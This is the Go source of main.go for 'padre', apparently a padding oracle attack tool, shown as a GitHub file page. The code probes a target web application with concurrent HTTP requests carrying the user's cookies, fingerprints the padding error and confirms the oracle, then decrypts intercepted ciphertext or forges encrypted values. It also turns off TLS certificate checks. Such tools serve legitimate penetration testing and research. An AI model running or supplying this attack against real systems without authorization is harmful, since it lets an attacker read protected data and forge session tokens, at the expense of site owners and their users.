-
Notifications
You must be signed in to change notification settings - Fork 22
/
Copy pathmain.go
297 lines (255 loc) · 7.43 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
package main
import (
"bufio"
"crypto/tls"
"fmt"
"net/http"
"os"
"github.com/glebarez/padre/pkg/client"
"github.com/glebarez/padre/pkg/color"
"github.com/glebarez/padre/pkg/encoder"
"github.com/glebarez/padre/pkg/exploit"
out "github.com/glebarez/padre/pkg/output"
"github.com/glebarez/padre/pkg/probe"
"github.com/glebarez/padre/pkg/util"
)
var (
stderr = color.Error
stdout = os.Stdout
)
func main() {
var err error
// initialize printer
print := &out.Printer{
Stream: stderr,
}
// determine terminal width
var termWidth int
termWidth, err = util.TerminalWidth()
if err != nil {
// fallback to default
print.AvailableWidth = defaultTerminalWidth
print.Errorf("Could not determine terminal width. Falling back to %d", defaultTerminalWidth)
err = nil //nolint
} else {
print.AvailableWidth = termWidth
}
// parse CLI arguments
args, errs := parseArgs()
// check if errors occurred during CLI arguments parsing
if len(errs.errors) > 0 {
print.AddPrefix(color.CyanBold("argument errors:"), true)
for _, e := range errs.errors {
print.Error(e)
}
print.RemovePrefix()
print.Printlnf("Run with %s option to see usage help", color.CyanBold("-h"))
os.Exit(1)
}
// check if warnings occurred during CLI arguments parsing
for _, w := range errs.warnings {
print.Warning(w)
}
// show welcoming message
print.Info("%s is on duty", color.CyanBold("padre"))
// be verbose about concurrency
print.Info("using concurrency (http connections): %s", color.Green(*args.Parallel))
// initialize HTTP client
client := &client.Client{
HTTPclient: &http.Client{
Transport: &http.Transport{
MaxConnsPerHost: *args.Parallel,
Proxy: http.ProxyURL(args.ProxyURL),
TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, // skip TLS verification
}},
URL: *args.TargetURL,
POSTdata: *args.POSTdata,
Cookies: args.Cookies,
CipherPlaceholder: `$`,
Encoder: args.Encoder,
Concurrency: *args.Parallel,
ContentType: *args.ContentType,
}
// create matcher for padding error
var matcher probe.PaddingErrorMatcher
if *args.PaddingErrorPattern != "" {
matcher, err = probe.NewMatcherByRegexp(*args.PaddingErrorPattern)
if err != nil {
print.Error(err)
os.Exit(1)
}
}
// -- detect/confirm padding oracle
// set block lengths to try
var blockLengths []int
if *args.BlockLen == 0 {
// no block length explicitly provided, we need to try all supported lengths
blockLengths = []int{8, 16, 32}
} else {
blockLengths = []int{*args.BlockLen}
}
var i, bl int
// if matcher was already created due to explicit pattern provided in args
// we need to just confirm the existence of padding oracle
if matcher != nil {
print.Action("confirming padding oracle...")
for i, bl = range blockLengths {
confirmed, err := probe.ConfirmPaddingOracle(client, matcher, bl)
if err != nil {
print.Error(err)
os.Exit(1)
}
// exit as soon as padding oracle is confirmed
if confirmed {
print.Success("padding oracle confirmed")
break
}
// on last iteration, getting here means confirming failed
if i == len(blockLengths)-1 {
print.Errorf("padding oracle was not confirmed")
printHints(print, makeDetectionHints(args))
os.Exit(1)
}
}
}
// if matcher was not created (e.g. pattern was not provided in CLI args)
// then we need to auto-detect the fingerprint of padding oracle
if matcher == nil {
print.Action("fingerprinting HTTP responses for padding oracle...")
for i, bl = range blockLengths {
matcher, err = probe.DetectPaddingErrorFingerprint(client, bl)
if err != nil {
print.Error(err)
os.Exit(1)
}
// exit as soon as fingerprint is detected
if matcher != nil {
print.Success("successfully detected padding oracle")
break
}
// on last iteration, getting here means confirming failed
if i == len(blockLengths)-1 {
print.Errorf("could not auto-detect padding oracle fingerprint")
printHints(print, makeDetectionHints(args))
os.Exit(1)
}
}
}
// set block length if it was auto-detected
if *args.BlockLen == 0 {
*args.BlockLen = bl
print.Success("detected block length: %s", color.Green(bl))
}
// print mode used
if *args.EncryptMode {
print.Warning("mode: %s", color.CyanBold("encrypt"))
} else {
print.Warning("mode: %s", color.CyanBold("decrypt"))
}
// build list of inputs to process
inputs := make([]string, 0)
if args.Input == nil {
print.Warning("no explicit input passed, expecting input from stdin...")
// read inputs from stdin
scanner := bufio.NewScanner(os.Stdin)
for scanner.Scan() {
inputs = append(inputs, scanner.Text())
}
} else {
// use single input, passed in CLI arguments
inputs = append(inputs, *args.Input)
}
// init padre instance
padre := &exploit.Padre{
Client: client,
Matcher: matcher,
BlockLen: *args.BlockLen,
}
// process inputs one by one
var errCount int
for i, input := range inputs {
// create new status bar for current input
prefix := color.CyanBold(fmt.Sprintf("[%d/%d]", i+1, len(inputs)))
print.AddPrefix(prefix, true)
var (
output []byte
bar *out.HackyBar
hints []string
)
// encrypt or decrypt
if *args.EncryptMode {
// init hacky bar
bar = out.CreateHackyBar(args.Encoder, len(exploit.Pkcs7Pad(input, bl))+bl, *args.EncryptMode, print)
// provide HTTP client with event-channel, so we can count RPS
client.RequestEventChan = bar.ChanReq
bar.Start()
output, err = padre.Encrypt(input, bar.ChanOutput)
if err != nil {
// at this stage, we already confirmed padding oracle
// we suppose the server is blocking connections
hints = append(hints, lowerConnections)
}
bar.Stop()
} else {
// decrypt mode
if input == "" {
err = fmt.Errorf("empty input")
goto Error
}
// decode input into bytes
var ciphertext []byte
ciphertext, err = args.Encoder.DecodeString(input)
if err != nil {
hints = append(hints, checkInput)
hints = append(hints, checkEncoding)
goto Error
}
// init hacky bar
bar = out.CreateHackyBar(encoder.NewASCIIencoder(), len(ciphertext)-bl, *args.EncryptMode, print)
// provide HTTP client with event-channel, so we can count RPS
client.RequestEventChan = bar.ChanReq
// do decryption
bar.Start()
output, err = padre.Decrypt(ciphertext, bar.ChanOutput)
bar.Stop()
if err != nil {
goto Error
}
}
// warn about output overflow
if bar.Overflow && util.IsTerminal(stdout) {
print.Warning("Output was too wide to fit to you terminal. Redirect STDOUT somewhere to get full output")
}
Error:
// in case of error, skip to the next input
if err != nil {
print.Error(err)
errCount++
if len(hints) > 0 {
printHints(print, hints)
}
continue
}
// write output only if output is redirected to file or piped
// this is because outputs already will be in status output
// so printing them to STDOUT again is not necessary
if !util.IsTerminal(stdout) {
/* in case of encryption, additionally encode the produced output */
if *args.EncryptMode {
outputStr := args.Encoder.EncodeToString(output)
_, err = stdout.WriteString(outputStr + "\n")
if err != nil {
// do not tolerate errors in output writer
print.Error(err)
os.Exit(1)
}
} else {
stdout.Write(append(output, '\n'))
}
}
}
/* non-zero return code if all inputs were errornous */
if len(inputs) == errCount {
os.Exit(2)
}
}